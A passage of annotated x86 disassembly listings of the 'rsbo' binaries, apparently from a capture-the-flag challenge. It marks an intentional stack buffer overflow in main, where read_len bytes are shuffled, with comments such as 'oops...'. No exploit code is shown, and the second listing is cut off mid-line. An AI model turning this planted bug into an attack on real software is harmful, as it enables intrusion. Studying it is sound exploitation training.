86 | 8048490: 31 ed xor %ebp,%ebp 87 | 8048492: 5e pop %esi 88 | 8048493: 89 e1 mov %esp,%ecx 89 | 8048495: 83 e4 f0 and $0xfffffff0,%esp 90 | 8048498: 50 push %eax 91 | 8048499: 54 push %esp 92 | 804849a: 52 push %edx 93 | 804849b: 68 b0 87 04 08 push $0x80487b0 94 | 80484a0: 68 40 87 04 08 push $0x8048740 95 | 80484a5: 51 push %ecx 96 | 80484a6: 56 push %esi 97 | 80484a7: 68 7f 86 04 08 push $0x804867f 98 | 80484ac: e8 8f ff ff ff call 8048440 <__libc_start_main@plt> 99 | 80484b1: f4 hlt 100 | 80484b2: 66 90 xchg %ax,%ax 101 | 80484b4: 66 90 xchg %ax,%ax 102 | 80484b6: 66 90 xchg %ax,%ax 103 | 80484b8: 66 90 xchg %ax,%ax 104 | 80484ba: 66 90 xchg %ax,%ax 105 | 80484bc: 66 90 xchg %ax,%ax 106 | 80484be: 66 90 xchg %ax,%ax 107 | 108 | 080484c0 <__x86.get_pc_thunk.bx>: 109 | 80484c0: 8b 1c 24 mov (%esp),%ebx 110 | 80484c3: c3 ret 111 | 80484c4: 66 90 xchg %ax,%ax 112 | 80484c6: 66 90 xchg %ax,%ax 113 | 80484c8: 66 90 xchg %ax,%ax 114 | 80484ca: 66 90 xchg %ax,%ax 115 | 80484cc: 66 90 xchg %ax,%ax 116 | 80484ce: 66 90 xchg %ax,%ax 117 | 118 | 080484d0 : 119 | 80484d0: b8 43 a0 04 08 mov $0x804a043,%eax 120 | 80484d5: 2d 40 a0 04 08 sub $0x804a040,%eax 121 | 80484da: 83 f8 06 cmp $0x6,%eax 122 | 80484dd: 77 01 ja 80484e0 123 | 80484df: c3 ret 124 | 80484e0: b8 00 00 00 00 mov $0x0,%eax 125 | 80484e5: 85 c0 test %eax,%eax 126 | 80484e7: 74 f6 je 80484df 127 | 80484e9: 55 push %ebp 128 | 80484ea: 89 e5 mov %esp,%ebp 129 | 80484ec: 83 ec 18 sub $0x18,%esp 130 | 80484ef: c7 04 24 40 a0 04 08 movl $0x804a040,(%esp) 131 | 80484f6: ff d0 call *%eax 132 | 80484f8: c9 leave 133 | 80484f9: c3 ret 134 | 80484fa: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 135 | 136 | 08048500 : 137 | 8048500: b8 40 a0 04 08 mov $0x804a040,%eax 138 | 8048505: 2d 40 a0 04 08 sub $0x804a040,%eax 139 | 804850a: c1 f8 02 sar $0x2,%eax 140 | 804850d: 89 c2 mov %eax,%edx 141 | 804850f: c1 ea 1f shr $0x1f,%edx 142 | 8048512: 01 d0 add %edx,%eax 143 | 8048514: d1 f8 sar %eax 144 | 8048516: 75 01 jne 8048519 145 | 8048518: c3 ret 146 | 8048519: ba 00 00 00 00 mov $0x0,%edx 147 | 804851e: 85 d2 test %edx,%edx 148 | 8048520: 74 f6 je 8048518 149 | 8048522: 55 push %ebp 150 | 8048523: 89 e5 mov %esp,%ebp 151 | 8048525: 83 ec 18 sub $0x18,%esp 152 | 8048528: 89 44 24 04 mov %eax,0x4(%esp) 153 | 804852c: c7 04 24 40 a0 04 08 movl $0x804a040,(%esp) 154 | 8048533: ff d2 call *%edx 155 | 8048535: c9 leave 156 | 8048536: c3 ret 157 | 8048537: 89 f6 mov %esi,%esi 158 | 8048539: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 159 | 160 | 08048540 <__do_global_dtors_aux>: 161 | 8048540: 80 3d 40 a0 04 08 00 cmpb $0x0,0x804a040 162 | 8048547: 75 13 jne 804855c <__do_global_dtors_aux+0x1c> 163 | 8048549: 55 push %ebp 164 | 804854a: 89 e5 mov %esp,%ebp 165 | 804854c: 83 ec 08 sub $0x8,%esp 166 | 804854f: e8 7c ff ff ff call 80484d0 167 | 8048554: c6 05 40 a0 04 08 01 movb $0x1,0x804a040 168 | 804855b: c9 leave 169 | 804855c: f3 c3 repz ret 170 | 804855e: 66 90 xchg %ax,%ax 171 | 172 | 08048560 : 173 | 8048560: a1 10 9f 04 08 mov 0x8049f10,%eax 174 | 8048565: 85 c0 test %eax,%eax 175 | 8048567: 74 1f je 8048588 176 | 8048569: b8 00 00 00 00 mov $0x0,%eax 177 | 804856e: 85 c0 test %eax,%eax 178 | 8048570: 74 16 je 8048588 179 | 8048572: 55 push %ebp 180 | 8048573: 89 e5 mov %esp,%ebp 181 | 8048575: 83 ec 18 sub $0x18,%esp 182 | 8048578: c7 04 24 10 9f 04 08 movl $0x8049f10,(%esp) 183 | 804857f: ff d0 call *%eax 184 | 8048581: c9 leave 185 | 8048582: e9 79 ff ff ff jmp 8048500 186 | 8048587: 90 nop 187 | 8048588: e9 73 ff ff ff jmp 8048500 188 | 189 | 0804858d : 190 | 804858d: 55 push %ebp 191 | 804858e: 89 e5 mov %esp,%ebp 192 | 8048590: 83 ec 38 sub $0x38,%esp 193 | 8048593: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp) 194 | 804859a: 00 195 | 804859b: c7 04 24 d0 87 04 08 movl $0x80487d0,(%esp) 196 | 80485a2: e8 79 fe ff ff call 8048420 197 | 80485a7: 89 45 ec mov %eax,-0x14(%ebp) 198 | 80485aa: c7 44 24 08 10 00 00 movl $0x10,0x8(%esp) 199 | 80485b1: 00 200 | 80485b2: 8d 45 dc lea -0x24(%ebp),%eax 201 | 80485b5: 89 44 24 04 mov %eax,0x4(%esp) 202 | 80485b9: 8b 45 ec mov -0x14(%ebp),%eax 203 | 80485bc: 89 04 24 mov %eax,(%esp) 204 | 80485bf: e8 1c fe ff ff call 80483e0 205 | 80485c4: c7 04 24 00 00 00 00 movl $0x0,(%esp) 206 | 80485cb: e8 20 fe ff ff call 80483f0 207 | 80485d0: 89 45 f0 mov %eax,-0x10(%ebp) ; -0x10(ebp) = time 208 | 80485d3: c7 45 f4 00 00 00 00 movl $0x0,-0xc(%ebp) 209 | 80485da: eb 47 jmp 8048623 210 | 211 | loop: 212 | 80485dc: 8b 45 f0 mov -0x10(%ebp),%eax ; eax = time 213 | 80485df: 69 d0 39 05 00 00 imul $0x539,%eax,%edx 214 | 80485e5: 8d 4d dc lea -0x24(%ebp),%ecx ; buf 215 | 80485e8: 8b 45 f4 mov -0xc(%ebp),%eax ; i 216 | 80485eb: 01 c8 add %ecx,%eax 217 | 80485ed: 0f b6 00 movzbl (%eax),%eax 218 | 80485f0: 0f be c0 movsbl %al,%eax 219 | 80485f3: 8d 0c 02 lea (%edx,%eax,1),%ecx 220 | 80485f6: ba 01 00 00 40 mov $0x40000001,%edx 221 | 80485fb: 89 c8 mov %ecx,%eax 222 | 80485fd: f7 ea imul %edx 223 | 80485ff: c1 fa 1d sar $0x1d,%edx 224 | 8048602: 89 c8 mov %ecx,%eax 225 | 8048604: c1 f8 1f sar $0x1f,%eax 226 | 8048607: 29 c2 sub %eax,%edx 227 | 8048609: 89 d0 mov %edx,%eax 228 | 804860b: 89 45 f0 mov %eax,-0x10(%ebp) 229 | 804860e: 8b 55 f0 mov -0x10(%ebp),%edx 230 | 8048611: 89 d0 mov %edx,%eax 231 | 8048613: c1 e0 1f shl $0x1f,%eax 232 | 8048616: 29 d0 sub %edx,%eax 233 | 8048618: 29 c1 sub %eax,%ecx 234 | 804861a: 89 c8 mov %ecx,%eax 235 | 804861c: 89 45 f0 mov %eax,-0x10(%ebp) 236 | 804861f: 83 45 f4 01 addl $0x1,-0xc(%ebp) ; i++ 237 | 8048623: 83 7d f4 0f cmpl $0xf,-0xc(%ebp) 238 | 8048627: 7e b3 jle 80485dc ; loop 239 | 240 | 8048629: 8b 45 ec mov -0x14(%ebp),%eax 241 | 804862c: 89 04 24 mov %eax,(%esp) 242 | 804862f: e8 4c fe ff ff call 8048480 243 | 8048634: c7 44 24 08 10 00 00 movl $0x10,0x8(%esp) 244 | 804863b: 00 245 | 804863c: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp) 246 | 8048643: 00 247 | 8048644: 8d 45 dc lea -0x24(%ebp),%eax 248 | 8048647: 89 04 24 mov %eax,(%esp) 249 | 804864a: e8 11 fe ff ff call 8048460 ; mess up 250 | 804864f: 8b 45 f0 mov -0x10(%ebp),%eax 251 | 8048652: 89 04 24 mov %eax,(%esp) 252 | 8048655: e8 d6 fd ff ff call 8048430 253 | 804865a: c9 leave 254 | 804865b: c3 ret 255 | 256 | 0804865c : 257 | 804865c: 55 push %ebp 258 | 804865d: 89 e5 mov %esp,%ebp 259 | 804865f: 83 ec 18 sub $0x18,%esp 260 | 8048662: c7 44 24 08 80 00 00 movl $0x80,0x8(%esp) 261 | 8048669: 00 262 | 804866a: 8b 45 08 mov 0x8(%ebp),%eax 263 | 804866d: 89 44 24 04 mov %eax,0x4(%esp) 264 | 8048671: c7 04 24 00 00 00 00 movl $0x0,(%esp) 265 | 8048678: e8 63 fd ff ff call 80483e0 266 | 804867d: c9 leave 267 | 804867e: c3 ret 268 | 269 | 0804867f
: 270 | 804867f: 55 push %ebp 271 | 8048680: 89 e5 mov %esp,%ebp 272 | 8048682: 83 e4 f0 and $0xfffffff0,%esp 273 | 8048685: 83 ec 70 sub $0x70,%esp 274 | 8048688: c7 04 24 1e 00 00 00 movl $0x1e,(%esp) 275 | 804868f: e8 6c fd ff ff call 8048400 276 | 8048694: e8 f4 fe ff ff call 804858d 277 | 8048699: 8d 44 24 10 lea 0x10(%esp),%eax 278 | 804869d: 89 04 24 mov %eax,(%esp) 279 | 80486a0: e8 b7 ff ff ff call 804865c 280 | 281 | 80486a5: 89 44 24 68 mov %eax,0x68(%esp) ; read_len 282 | 80486a9: c7 44 24 6c 00 00 00 movl $0x0,0x6c(%esp) ; i 283 | 80486b0: 00 284 | 285 | 80486b1: eb 55 jmp 8048708 286 | 287 | loop: 288 | 80486b3: e8 b8 fd ff ff call 8048470 289 | 80486b8: 8b 54 24 6c mov 0x6c(%esp),%edx 290 | 80486bc: 8d 4a 01 lea 0x1(%edx),%ecx 291 | 80486bf: 99 cltd 292 | 80486c0: f7 f9 idiv %ecx 293 | 80486c2: 89 54 24 64 mov %edx,0x64(%esp) 294 | 80486c6: 8d 54 24 10 lea 0x10(%esp),%edx 295 | 80486ca: 8b 44 24 6c mov 0x6c(%esp),%eax 296 | 80486ce: 01 d0 add %edx,%eax 297 | 80486d0: 0f b6 00 movzbl (%eax),%eax 298 | 80486d3: 0f be c0 movsbl %al,%eax 299 | 80486d6: 89 44 24 60 mov %eax,0x60(%esp) 300 | 80486da: 8d 54 24 10 lea 0x10(%esp),%edx 301 | 80486de: 8b 44 24 64 mov 0x64(%esp),%eax 302 | 80486e2: 01 d0 add %edx,%eax 303 | 80486e4: 0f b6 00 movzbl (%eax),%eax 304 | 80486e7: 8d 4c 24 10 lea 0x10(%esp),%ecx 305 | 80486eb: 8b 54 24 6c mov 0x6c(%esp),%edx 306 | 80486ef: 01 ca add %ecx,%edx 307 | 308 | 80486f1: 88 02 mov %al,(%edx) ; oops... 309 | 310 | 80486f3: 8b 44 24 60 mov 0x60(%esp),%eax 311 | 80486f7: 8d 4c 24 10 lea 0x10(%esp),%ecx 312 | 80486fb: 8b 54 24 64 mov 0x64(%esp),%edx 313 | 80486ff: 01 ca add %ecx,%edx 314 | 315 | 8048701: 88 02 mov %al,(%edx) ; oops... 316 | 317 | 8048703: 83 44 24 6c 01 addl $0x1,0x6c(%esp) 318 | 8048708: 8b 44 24 6c mov 0x6c(%esp),%eax 319 | 804870c: 3b 44 24 68 cmp 0x68(%esp),%eax 320 | 8048710: 7c a1 jl 80486b3 321 | 322 | 8048712: 8b 44 24 68 mov 0x68(%esp),%eax 323 | 8048716: 89 44 24 08 mov %eax,0x8(%esp) 324 | 804871a: 8d 44 24 10 lea 0x10(%esp),%eax 325 | 804871e: 89 44 24 04 mov %eax,0x4(%esp) 326 | 8048722: c7 04 24 01 00 00 00 movl $0x1,(%esp) 327 | 8048729: e8 22 fd ff ff call 8048450 328 | 804872e: b8 00 00 00 00 mov $0x0,%eax 329 | 8048733: c9 leave 330 | 8048734: c3 ret 331 | 8048735: 66 90 xchg %ax,%ax 332 | 8048737: 66 90 xchg %ax,%ax 333 | 8048739: 66 90 xchg %ax,%ax 334 | 804873b: 66 90 xchg %ax,%ax 335 | 804873d: 66 90 xchg %ax,%ax 336 | 804873f: 90 nop 337 | 338 | 08048740 <__libc_csu_init>: 339 | 8048740: 55 push %ebp 340 | 8048741: 57 push %edi 341 | 8048742: 31 ff xor %edi,%edi 342 | 8048744: 56 push %esi 343 | 8048745: 53 push %ebx 344 | 8048746: e8 75 fd ff ff call 80484c0 <__x86.get_pc_thunk.bx> 345 | 804874b: 81 c3 b5 18 00 00 add $0x18b5,%ebx 346 | 8048751: 83 ec 1c sub $0x1c,%esp 347 | 8048754: 8b 6c 24 30 mov 0x30(%esp),%ebp 348 | 8048758: 8d b3 0c ff ff ff lea -0xf4(%ebx),%esi 349 | 804875e: e8 49 fc ff ff call 80483ac <_init> 350 | 8048763: 8d 83 08 ff ff ff lea -0xf8(%ebx),%eax 351 | 8048769: 29 c6 sub %eax,%esi 352 | 804876b: c1 fe 02 sar $0x2,%esi 353 | 804876e: 85 f6 test %esi,%esi 354 | 8048770: 74 27 je 8048799 <__libc_csu_init+0x59> 355 | 8048772: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 356 | 8048778: 8b 44 24 38 mov 0x38(%esp),%eax 357 | 804877c: 89 2c 24 mov %ebp,(%esp) 358 | 804877f: 89 44 24 08 mov %eax,0x8(%esp) 359 | 8048783: 8b 44 24 34 mov 0x34(%esp),%eax 360 | 8048787: 89 44 24 04 mov %eax,0x4(%esp) 361 | 804878b: ff 94 bb 08 ff ff ff call *-0xf8(%ebx,%edi,4) 362 | 8048792: 83 c7 01 add $0x1,%edi 363 | 8048795: 39 f7 cmp %esi,%edi 364 | 8048797: 75 df jne 8048778 <__libc_csu_init+0x38> 365 | 8048799: 83 c4 1c add $0x1c,%esp 366 | 804879c: 5b pop %ebx 367 | 804879d: 5e pop %esi 368 | 804879e: 5f pop %edi 369 | 804879f: 5d pop %ebp 370 | 80487a0: c3 ret 371 | 80487a1: eb 0d jmp 80487b0 <__libc_csu_fini> 372 | 80487a3: 90 nop 373 | 80487a4: 90 nop 374 | 80487a5: 90 nop 375 | 80487a6: 90 nop 376 | 80487a7: 90 nop 377 | 80487a8: 90 nop 378 | 80487a9: 90 nop 379 | 80487aa: 90 nop 380 | 80487ab: 90 nop 381 | 80487ac: 90 nop 382 | 80487ad: 90 nop 383 | 80487ae: 90 nop 384 | 80487af: 90 nop 385 | 386 | 080487b0 <__libc_csu_fini>: 387 | 80487b0: f3 c3 repz ret 388 | 389 | Disassembly of section .fini: 390 | 391 | 080487b4 <_fini>: 392 | 80487b4: 53 push %ebx 393 | 80487b5: 83 ec 08 sub $0x8,%esp 394 | 80487b8: e8 03 fd ff ff call 80484c0 <__x86.get_pc_thunk.bx> 395 | 80487bd: 81 c3 43 18 00 00 add $0x1843,%ebx 396 | 80487c3: 83 c4 08 add $0x8,%esp 397 | 80487c6: 5b pop %ebx 398 | 80487c7: c3 ret 399 | -------------------------------------------------------------------------------- /rsbo.txt: -------------------------------------------------------------------------------- 1 | 2 | rsbo-201d81c2bc117620f8fd223d013c17fa: file format elf32-i386 3 | 4 | 5 | Disassembly of section .init: 6 | 7 | 080483f0 <_init>: 8 | 80483f0: 53 push %ebx 9 | 80483f1: 83 ec 08 sub $0x8,%esp 10 | 80483f4: e8 27 01 00 00 call 8048520 <__x86.get_pc_thunk.bx> 11 | 80483f9: 81 c3 07 1c 00 00 add $0x1c07,%ebx 12 | 80483ff: 8b 83 fc ff ff ff mov -0x4(%ebx),%eax 13 | 8048405: 85 c0 test %eax,%eax 14 | 8048407: 74 05 je 804840e <_init+0x1e> 15 | 8048409: e8 62 00 00 00 call 8048470 <__gmon_start__@plt> 16 | 804840e: 83 c4 08 add $0x8,%esp 17 | 8048411: 5b pop %ebx 18 | 8048412: c3 ret 19 | 20 | Disassembly of section .plt: 21 | 22 | 08048420 : 23 | 8048420: ff 35 04 a0 04 08 pushl 0x804a004 24 | 8048426: ff 25 08 a0 04 08 jmp *0x804a008 25 | 804842c: 00 00 add %al,(%eax) 26 | ... 27 | 28 | 08048430 : 29 | 8048430: ff 25 0c a0 04 08 jmp *0x804a00c 30 | 8048436: 68 00 00 00 00 push $0x0 31 | 804843b: e9 e0 ff ff ff jmp 8048420 <_init+0x30> 32 | 33 | 08048440 : 34 | 8048440: ff 25 10 a0 04 08 jmp *0x804a010 35 | 8048446: 68 08 00 00 00 push $0x8 36 | 804844b: e9 d0 ff ff ff jmp 8048420 <_init+0x30> 37 | 38 | 08048450 : 39 | 8048450: ff 25 14 a0 04 08 jmp *0x804a014 40 | 8048456: 68 10 00 00 00 push $0x10 41 | 804845b: e9 c0 ff ff ff jmp 8048420 <_init+0x30> 42 | 43 | 08048460 <__stack_chk_fail@plt>: 44 | 8048460: ff 25 18 a0 04 08 jmp *0x804a018 45 | 8048466: 68 18 00 00 00 push $0x18 46 | 804846b: e9 b0 ff ff ff jmp 8048420 <_init+0x30> 47 | 48 | 08048470 <__gmon_start__@plt>: 49 | 8048470: ff 25 1c a0 04 08 jmp *0x804a01c 50 | 8048476: 68 20 00 00 00 push $0x20 51 | 804847b: e9 a0 ff ff ff jmp 8048420 <_init+0x30> 52 | 53 | 08048480 : 54 | 8048480: ff 25 20 a0 04 08 jmp *0x804a020 55 | 8048486: 68 28 00 00 00 push $0x28 56 | 804848b: e9 90 ff ff ff jmp 8048420 <_init+0x30> 57 | 58 | 08048490 : 59 | 8048490: ff 25 24 a0 04 08 jmp *0x804a024 60 | 8048496: 68 30 00 00 00 push $0x30 61 | 804849b: e9 80 ff ff ff jmp 8048420 <_init+0x30> 62 | 63 | 080484a0 <__libc_start_main@plt>: 64 | 80484a0: ff 25 28 a0 04 08 jmp *0x804a028 65 | 80484a6: 68 38 00 00 00 push $0x38 66 | 80484ab: e9 70 ff ff ff jmp 8048420 <_init+0x30> 67 | 68 | 080484b0 : 69 | 80484b0: ff 25 2c a0 04 08 jmp *0x804a02c 70 | 80484b6: 68 40 00 00 00 push $0x40 71 | 80484bb: e9 60 ff ff ff jmp 8048420 <_init+0x30> 72 | 73 | 080484c0 : 74 | 80484c0: ff 25 30 a0 04 08 jmp *0x804a030 75 | 80484c6: 68 48 00 00 00 push $0x48 76 | 80484cb: e9 50 ff ff ff jmp 8048420 <_init+0x30> 77 | 78 | 080484d0 : 79 | 80484d0: ff 25 34 a0 04 08 jmp *0x804a034 80 | 80484d6: 68 50 00 00 00 push $0x50 81 | 80484db: e9 40 ff ff ff jmp 8048420 <_init+0x30> 82 | 83 | 080484e0 : 84 | 80484e0: ff 25 38 a0 04 08 jmp *0x804a038 85 | 80484e6: 68 58 00 00 00 push $0x58 86 | 80484eb: e9 30 ff ff ff jmp 8048420 <_init+0x30> 87 | 88 | Disassembly of section .text: 89 | 90 | 080484f0 <_start>: 91 | 80484f0: 31 ed xor %ebp,%ebp 92 | 80484f2: 5e pop %esi 93 | 80484f3: 89 e1 mov %esp,%ecx 94 | 80484f5: 83 e4 f0 and $0xfffffff0,%esp 95 | 80484f8: 50 push %eax 96 | 80484f9: 54 push %esp 97 | 80484fa: 52 push %edx 98 | 80484fb: 68 50 88 04 08 push $0x8048850 99 | 8048500: 68 e0 87 04 08 push $0x80487e0 100 | 8048505: 51 push %ecx 101 | 8048506: 56 push %esi 102 | 8048507: 68 fb 86 04 08 push $0x80486fb 103 | 804850c: e8 8f ff ff ff call 80484a0 <__libc_start_main@plt> 104 | 8048511: f4 hlt 105 | 8048512: 66 90 xchg %ax,%ax 106 | 8048514: 66 90 xchg %ax,%ax 107 | 8048516: 66 90 xchg %ax,%ax 108 | 8048518: 66 90 xchg %ax,%ax 109 | 804851a: 66 90 xchg %ax,%ax 110 | 804851c: 66 90 xchg %ax,%ax 111 | 804851e: 66 90 xchg %ax,%ax 112 | 113 | 08048520 <__x86.get_pc_thunk.bx>: 114 | 8048520: 8b 1c 24 mov (%esp),%ebx 115 | 8048523: c3 ret 116 | 8048524: 66 90 xchg %ax,%ax 117 | 8048526: 66 90 xchg %ax,%ax 118 | 8048528: 66 90 xchg %ax,%ax 119 | 804852a: 66 90 xchg %ax,%ax 120 | 804852c: 66 90 xchg %ax,%ax 121 | 804852e: 66 90 xchg %ax,%ax 122 | 123 | 08048530 : 124 | 8048530: b8 47 a0 04 08 mov $0x804a047,%eax 125 | 8048535: 2d 44 a0 04 08 sub $0x804a044,%eax 126 | 804853a: 83 f8 06 cmp $0x6,%eax 127 | 804853d: 77 01 ja 8048540 128 | 804853f: c3 ret 129 | 8048540: b8 00 00 00 00 mov $0x0,%eax 130 | 8048545: 85 c0 test %eax,%eax 131 | 8048547: 74 f6 je 804853f 132 | 8048549: 55 push %ebp 133 | 804854a: 89 e5 mov %esp,%ebp 134 | 804854c: 83 ec 18 sub $0x18,%esp 135 | 804854f: c7 04 24 44 a0 04 08 movl $0x804a044,(%esp) 136 | 8048556: ff d0 call *%eax 137 | 8048558: c9 leave 138 | 8048559: c3 ret 139 | 804855a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 140 | 141 | 08048560 : 142 | 8048560: b8 44 a0 04 08 mov $0x804a044,%eax 143 | 8048565: 2d 44 a0 04 08 sub $0x804a044,%eax 144 | 804856a: c1 f8 02 sar $0x2,%eax 145 | 804856d: 89 c2 mov %eax,%edx 146 | 804856f: c1 ea 1f shr $0x1f,%edx 147 | 8048572: 01 d0 add %edx,%eax 148 | 8048574: d1 f8 sar %eax 149 | 8048576: 75 01 jne 8048579 150 | 8048578: c3 ret 151 | 8048579: ba 00 00 00 00 mov $0x0,%edx 152 | 804857e: 85 d2 test %edx,%edx 153 | 8048580: 74 f6 je 8048578 154 | 8048582: 55 push %ebp 155 | 8048583: 89 e5 mov %esp,%ebp 156 | 8048585: 83 ec 18 sub $0x18,%esp 157 | 8048588: 89 44 24 04 mov %eax,0x4(%esp) 158 | 804858c: c7 04 24 44 a0 04 08 movl $0x804a044,(%esp) 159 | 8048593: ff d2 call *%edx 160 | 8048595: c9 leave 161 | 8048596: c3 ret 162 | 8048597: 89 f6 mov %esi,%esi 163 | 8048599: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 164 | 165 | 080485a0 <__do_global_dtors_aux>: 166 | 80485a0: 80 3d 44 a0 04 08 00 cmpb $0x0,0x804a044 167 | 80485a7: 75 13 jne 80485bc <__do_global_dtors_aux+0x1c> 168 | 80485a9: 55 push %ebp 169 | 80485aa: 89 e5 mov %esp,%ebp 170 | 80485ac: 83 ec 08 sub $0x8,%esp 171 | 80485af: e8 7c ff ff ff call 8048530 172 | 80485b4: c6 05 44 a0 04 08 01 movb $0x1,0x804a044 173 | 80485bb: c9 leave 174 | 80485bc: f3 c3 repz ret 175 | 80485be: 66 90 xchg %ax,%ax 176 | 177 | 080485c0 : 178 | 80485c0: a1 10 9f 04 08 mov 0x8049f10,%eax 179 | 80485c5: 85 c0 test %eax,%eax 180 | 80485c7: 74 1f je 80485e8 181 | 80485c9: b8 00 00 00 00 mov $0x0,%eax 182 | 80485ce: 85 c0 test %eax,%eax 183 | 80485d0: 74 16 je 80485e8 184 | 80485d2: 55 push %ebp 185 | 80485d3: 89 e5 mov %esp,%ebp 186 | 80485d5: 83 ec 18 sub $0x18,%esp 187 | 80485d8: c7 04 24 10 9f 04 08 movl $0x8049f10,(%esp) 188 | 80485df: ff d0 call *%eax 189 | 80485e1: c9 leave 190 | 80485e2: e9 79 ff ff ff jmp 8048560 191 | 80485e7: 90 nop 192 | 80485e8: e9 73 ff ff ff jmp 8048560 193 | 194 | 080485ed : 195 | 80485ed: 55 push %ebp 196 | 80485ee: 89 e5 mov %esp,%ebp 197 | 80485f0: 83 ec 38 sub $0x38,%esp 198 | 80485f3: 65 a1 14 00 00 00 mov %gs:0x14,%eax 199 | 80485f9: 89 45 f4 mov %eax,-0xc(%ebp) 200 | 80485fc: 31 c0 xor %eax,%eax 201 | 80485fe: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp) 202 | 8048605: 00 203 | 8048606: c7 04 24 70 88 04 08 movl $0x8048870,(%esp) 204 | 804860d: e8 6e fe ff ff call 8048480 205 | 8048612: 89 45 e0 mov %eax,-0x20(%ebp) 206 | 8048615: c7 44 24 08 10 00 00 movl $0x10,0x8(%esp) 207 | 804861c: 00 208 | 804861d: 8d 45 e4 lea -0x1c(%ebp),%eax 209 | 8048620: 89 44 24 04 mov %eax,0x4(%esp) 210 | 8048624: 8b 45 e0 mov -0x20(%ebp),%eax 211 | 8048627: 89 04 24 mov %eax,(%esp) 212 | 804862a: e8 01 fe ff ff call 8048430 213 | 804862f: c7 04 24 00 00 00 00 movl $0x0,(%esp) 214 | 8048636: e8 05 fe ff ff call 8048440 215 | 804863b: 89 45 dc mov %eax,-0x24(%ebp) 216 | 804863e: c7 45 d8 00 00 00 00 movl $0x0,-0x28(%ebp) 217 | 8048645: eb 47 jmp 804868e 218 | 8048647: 8b 45 dc mov -0x24(%ebp),%eax 219 | 804864a: 69 d0 39 05 00 00 imul $0x539,%eax,%edx 220 | 8048650: 8d 4d e4 lea -0x1c(%ebp),%ecx 221 | 8048653: 8b 45 d8 mov -0x28(%ebp),%eax 222 | 8048656: 01 c8 add %ecx,%eax 223 | 8048658: 0f b6 00 movzbl (%eax),%eax 224 | 804865b: 0f be c0 movsbl %al,%eax 225 | 804865e: 8d 0c 02 lea (%edx,%eax,1),%ecx 226 | 8048661: ba 01 00 00 40 mov $0x40000001,%edx 227 | 8048666: 89 c8 mov %ecx,%eax 228 | 8048668: f7 ea imul %edx 229 | 804866a: c1 fa 1d sar $0x1d,%edx 230 | 804866d: 89 c8 mov %ecx,%eax 231 | 804866f: c1 f8 1f sar $0x1f,%eax 232 | 8048672: 29 c2 sub %eax,%edx 233 | 8048674: 89 d0 mov %edx,%eax 234 | 8048676: 89 45 dc mov %eax,-0x24(%ebp) 235 | 8048679: 8b 55 dc mov -0x24(%ebp),%edx 236 | 804867c: 89 d0 mov %edx,%eax 237 | 804867e: c1 e0 1f shl $0x1f,%eax 238 | 8048681: 29 d0 sub %edx,%eax 239 | 8048683: 29 c1 sub %eax,%ecx 240 | 8048685: 89 c8 mov %ecx,%eax 241 | 8048687: 89 45 dc mov %eax,-0x24(%ebp) 242 | 804868a: 83 45 d8 01 addl $0x1,-0x28(%ebp) 243 | 804868e: 83 7d d8 0f cmpl $0xf,-0x28(%ebp) 244 | 8048692: 7e b3 jle 8048647 245 | 8048694: 8b 45 e0 mov -0x20(%ebp),%eax 246 | 8048697: 89 04 24 mov %eax,(%esp) 247 | 804869a: e8 41 fe ff ff call 80484e0 248 | 804869f: c7 44 24 08 10 00 00 movl $0x10,0x8(%esp) 249 | 80486a6: 00 250 | 80486a7: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp) 251 | 80486ae: 00 252 | 80486af: 8d 45 e4 lea -0x1c(%ebp),%eax 253 | 80486b2: 89 04 24 mov %eax,(%esp) 254 | 80486b5: e8 06 fe ff ff call 80484c0 255 | 80486ba: 8b 45 dc mov -0x24(%ebp),%eax 256 | 80486bd: 89 04 24 mov %eax,(%esp) 257 | 80486c0: e8 cb fd ff ff call 8048490 258 | 80486c5: 8b 45 f4 mov -0xc(%ebp),%eax 259 | 80486c8: 65 33 05 14 00 00 00 xor %gs:0x14,%eax 260 | 80486cf: 74 05 je 80486d6 261 | 80486d1: e8 8a fd ff ff call 8048460 <__stack_chk_fail@plt> 262 | 80486d6: c9 leave 263 | 80486d7: c3 ret 264 | 265 | 080486d8 : 266 | 80486d8: 55 push %ebp 267 | 80486d9: 89 e5 mov %esp,%ebp 268 | 80486db: 83 ec 18 sub $0x18,%esp 269 | 80486de: c7 44 24 08 80 00 00 movl $0x80,0x8(%esp) 270 | 80486e5: 00 271 | 80486e6: 8b 45 08 mov 0x8(%ebp),%eax 272 | 80486e9: 89 44 24 04 mov %eax,0x4(%esp) 273 | 80486ed: c7 04 24 00 00 00 00 movl $0x0,(%esp) 274 | 80486f4: e8 37 fd ff ff call 8048430 275 | 80486f9: c9 leave 276 | 80486fa: c3 ret 277 | 278 | 080486fb
: 279 | 80486fb: 55 push %ebp 280 | 80486fc: 89 e5 mov %esp,%ebp 281 | 80486fe: 53 push %ebx 282 | 80486ff: 83 e4 f0 and $0xfffffff0,%esp 283 | 8048702: 83 c4 80 add $0xffffff80,%esp 284 | 8048705: 65 a1 14 00 00 00 mov %gs:0x14,%eax 285 | 804870b: 89 44 24 7c mov %eax,0x7c(%esp) 286 | 804870f: 31 c0 xor %eax,%eax 287 | 8048711: c7 04 24 1e 00 00 00 movl $0x1e,(%esp) 288 | 8048718: e8 33 fd ff ff call 8048450 289 | 804871d: e8 cb fe ff ff call 80485ed 290 | 8048722: 8d 44 24 2c lea 0x2c(%esp),%eax 291 | 8048726: 89 04 24 mov %eax,(%esp) 292 | 8048729: e8 aa ff ff ff call 80486d8 293 | 804872e: 89 44 24 20 mov %eax,0x20(%esp) 294 | 8048732: c7 44 24 1c 00 00 00 movl $0x0,0x1c(%esp) 295 | 8048739: 00 296 | 804873a: eb 55 jmp 8048791 297 | 804873c: e8 8f fd ff ff call 80484d0 298 | 8048741: 8b 54 24 1c mov 0x1c(%esp),%edx 299 | 8048745: 8d 4a 01 lea 0x1(%edx),%ecx 300 | 8048748: 99 cltd 301 | 8048749: f7 f9 idiv %ecx 302 | 804874b: 89 54 24 24 mov %edx,0x24(%esp) 303 | 804874f: 8d 54 24 2c lea 0x2c(%esp),%edx 304 | 8048753: 8b 44 24 1c mov 0x1c(%esp),%eax 305 | 8048757: 01 d0 add %edx,%eax 306 | 8048759: 